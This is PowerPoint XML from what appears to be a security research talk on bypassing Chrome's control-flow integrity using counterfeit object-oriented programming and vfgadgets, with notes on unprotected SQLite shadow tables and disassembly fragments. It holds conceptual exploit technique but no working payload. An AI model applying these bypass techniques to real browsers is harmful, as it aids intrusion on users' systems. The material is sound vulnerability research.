              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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00000000019C17F0 loc_19C17F0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="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a:solidFill>
                  <a:srgbClr val="AEAEAE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; CODE XREF: sub_4C03B40+7C↑j</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a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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00000000019C17F0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="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jmp</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loc_4B30FE0</a:t>
            </a:r>
          </a:p>
          <a:p>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>19C17F8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      loc_4B31AC0</a:t>
            </a:r>
          </a:p>
          <a:p>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00000000019C1800 </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jmp</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loc_4B390E0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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00000000019C1808 </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jmp</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loc_4B19720</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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00000000019C1810 </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jmp</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loc_4B194F0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>text:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000019C1818 </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jmp</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loc_4B34B50</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718457" y="3172408"/>
            <a:ext cx="5755822" cy="199441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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399888250"/>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Counterfeit Object Oriented Programing</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279918" y="1825625"/>
            <a:ext cx="5878286" cy="4855093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Call into functions that the CFI allows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Goal : Bypass CFI using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vfgadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5124" name="Picture 4" descr="counterfeit object oriented programmingì ëí ì´ë¯¸ì§ ê²ìê²°ê³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6586" y="1545156"/>
            <a:ext cx="5262228" cy="4127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1608358"/>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951304" y="2269866"/>
            <a:ext cx="5175380" cy="2698926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypassing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chrome’s CFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- Take 1 -</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="street fighter round 1 fightì ëí ì´ë¯¸ì§ ê²ìê²°ê³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123" y="1127581"/>
            <a:ext cx="6644660" cy="4983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58277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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> WHOAMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> ¿</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Security Researcher at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exodus Intelligence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Ex-Researcher in Department of Defense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Interest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>in vulnerability research in various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Operating Systems, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Browsers, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Hypervisors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Distant Past : CTF competitions, Penetration Testing, Mobile-App Auditing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>WebHacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, Reverse Engineering, Electronics &amp; Semiconductors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(University)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Present : Focusing on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser 0day research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Huge Zelda Fan </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="zelda sword icon ext:pngì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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77985" y="5919388"/>
            <a:ext cx="526012" cy="450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49889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Key takeaways from shadow tables</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>There is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(was)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no Access Control Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> on shadow tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Possible to read/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> data within shadow tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Hardened </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>in 3.26.0 by the SQLITE_DBCONFIG_DEFENSIVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>      (It could be bypassed with SQL injection into dynamic queries…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3070546991"/>
      </p:ext>
    </p:extLst>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Finding an AAW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>vfgadget</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8005665" y="1"/>
            <a:ext cx="4186335"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8369559" y="1856778"/>
            <a:ext cx="3618722" cy="3293209"/>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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>test_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="AEAEAE"/>
              </a:solidFill>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>classA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>field1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>testfield</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>field2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>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6" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279918" y="1825625"/>
            <a:ext cx="7522028" cy="4855093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
